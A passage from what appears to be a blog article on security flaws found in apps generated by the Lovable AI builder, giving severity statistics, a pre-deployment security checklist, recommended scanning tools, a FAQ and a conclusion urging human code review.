🟠 High: 7 vulnerabilities (44%) ██████████████████████

🟡 Medium: 4 vulnerabilities (25%) ████████████

Key insight: 75% of the vulnerabilities discovered (12 of 16) are rated High or Critical. This means that a typical Lovable-generated application deployed without a security review faces serious, exploitable risks from day one.

For context, even one unaddressed Critical vulnerability is normally treated as a release blocker. Across the applications I tested, I found five distinct Critical issues.

How to Secure Your Lovable AI Generated Applications

Finding Lovable AI security vulnerabilities is important, but fixing them is what matters. Here’s your complete action plan.

Security Checklist Before Deploying Lovable Apps

Use this 10-step security checklist before deploying any Lovable-generated application to production:

- ✅ Review ALL generated code before deployment — read every file

- ✅ Remove hardcoded API keys and move them to environment variables

- ✅ Implement proper authentication with password complexity and MFA

- ✅ Enable Supabase Row Level Security (RLS) on every single table

- ✅ Add input validation on both client and server side

- ✅ Enable HTTPS and set all security headers

- ✅ Implement rate limiting on login, API, and form endpoints

- ✅ Add CSRF protection to all state-changing forms

- ✅ Set up proper error handling — generic messages for users, detailed logs internally

- ✅ Run automated security scans before every deployment

📌 Pro Tip: Print this checklist and tape it next to your monitor. Run through it every single time you deploy a Lovable-generated app. No exceptions.

Recommended Security Tools for Vibe-Coded Apps

| Tool | Purpose | Free? |
|---|---|---|
| OWASP ZAP | Vulnerability scanning | ✅ Free |
| Snyk | Dependency scanning | Freemium |
| SonarQube | Code quality + security | Freemium |
| Burp Suite | Penetration testing | Freemium |
| ESLint Security | JS security linting | ✅ Free |
| SecurityHeaders.com | Header analysis | ✅ Free |

When to Use Lovable AI (And When Not To)

Based on my testing, here’s an honest assessment:

- ✅ Safe for: Prototypes, MVPs, internal tools, hackathon projects, learning exercises

- ⚠️ Risky for: Production apps handling user data, apps with payment processing

- ❌ Dangerous for: Fintech applications, healthcare (HIPAA), e-commerce with stored payment info, apps handling children’s data (COPPA) — unless you conduct a thorough security audit

Should You Trust AI Code Generators for Production Apps?

Let me be direct: AI code generation is a tool, not a replacement for security expertise.

The 16 Lovable AI security vulnerabilities I found aren’t unique to Lovable. Bolt.new, Replit, and other vibe coding tools share many of the same weaknesses. The problem isn’t any single platform — it’s the fundamental approach of generating code without security context.

Here’s the counterintuitive truth: AI code generators can actually improve security — but only when used by developers who understand security in the first place. If you know what to look for, you can prompt the AI to generate more secure code, review the output critically, and patch vulnerabilities before deployment.

The danger comes when non-technical users treat these tools as complete solutions. When you vibe code an entire SaaS application and deploy it without a single line of code review, you’re essentially publishing a vulnerable application to the internet and hoping nobody attacks it.

What needs to change:

- Lovable and competitors need to build security scanning into their generation pipeline

- Developers need to treat AI-generated code with the same scrutiny as code from an untrusted contractor

- The industry needs security-aware AI code generation models trained specifically on secure coding patterns

- Education must catch up — vibe coding tutorials should include security modules

The responsibility lies with the developer, not the AI. These tools will get better over time, but right now, human oversight is non-negotiable.

Frequently Asked Questions (FAQ)

Is Lovable AI safe to use for building apps?

Lovable AI is safe for building prototypes, internal tools, and learning projects. However, deploying Lovable-generated applications to production without a thorough security review is risky. The platform generates functional code that often lacks critical security measures like proper authentication, input validation, and access control. Always audit generated code before exposing it to real users and sensitive data.

What are the biggest security risks in Lovable AI?

The five most critical Lovable AI security vulnerabilities are: (1) broken authentication with no password strength requirements, (2) exposed API keys in client-side code, (3) SQL injection through unsanitized queries, (4) hardcoded credentials in source files, and (5) broken access control allowing users to access other users’ data. These five critical flaws alone can lead to complete application compromise.

What is vibe hacking?

Vibe hacking is the practice of exploiting security flaws in AI-generated applications built through vibe coding. While vibe coding involves prompting AI to build applications without deep code review, vibe hacking uses the same exploratory, casual approach to discover and exploit vulnerabilities in those generated applications. The term highlights the security gap created when developers prioritize speed over security in AI-assisted development.

Can AI-generated code be secure?

Yes, AI-generated code can be secure — but it requires human intervention. Developers must review generated code for vulnerabilities, add security measures that the AI omits, and test the application against common attack vectors before deployment. Using AI as a starting point rather than a finished product, combined with automated security scanning tools, can produce reasonably secure applications.

How do I secure an app built with Lovable AI?

Follow these five steps: (1) Enable Supabase Row Level Security on every database table, (2) move all API keys and credentials to environment variables, (3) add server-side input validation on every endpoint, (4) implement rate limiting and CSRF protection, and (5) run OWASP ZAP or Snyk scans before deployment. These five actions address the majority of Lovable AI security vulnerabilities.

Is Lovable AI safer than Bolt.new or Cursor?

No vibe coding tool currently prioritizes security by default. Lovable and Bolt.new share similar vulnerabilities because both auto-generate full-stack applications without built-in security review. Cursor is slightly different — it assists with code rather than generating complete applications — giving developers more control over security implementation. However, all AI code generation tools require manual security review before production deployment.

Should I use Lovable AI for a production app?

You can use Lovable AI for production apps if — and only if — you conduct a comprehensive security audit of all generated code, implement the security measures outlined in this article, and have someone with security expertise review the application before launch. For applications handling sensitive data (financial, health, personal), additional security hardening and compliance review is essential.

Conclusion — The Future of Vibe Coding Security

The 16 Lovable AI security vulnerabilities I found through vibe hacking reveal an uncomfortable truth about the current state of AI code generation: we’re building faster than we’re building safely.

Lovable AI is a powerful, impressive tool. It genuinely democratizes application development and makes building software accessible to people who could never do it before. That’s a good thing. But power without guardrails is dangerous.

Five critical vulnerabilities. Seven high-severity flaws. Four medium-risk issues. Across every application I tested, the pattern was consistent — the code worked, but it wasn’t secure.

Vibe coding is here to stay. It’s not going away, and it shouldn’t. But the security ecosystem around it must evolve. Tool builders need to integrate security scanning into their pipelines. Developers need to learn basic security principles alongside prompt engineering. And the community needs to share findings openly, so we can collectively raise the bar.

If you’re using Lovable AI — or any vibe coding tool — take the 10-step security checklist from this article and apply it to every project. Read the code. Question the defaults. Test for vulnerabilities before your users (or attackers) find them.

Vibe coding gives everyone the power to build. But without security awareness, we’re building castles on sand. The 16 Lovable AI security vulnerabilities I found prove that AI can write code — but it can’t yet write safe code.

The future of vibe coding security depends on what we do today. Start with your next Lovable project — and build it right.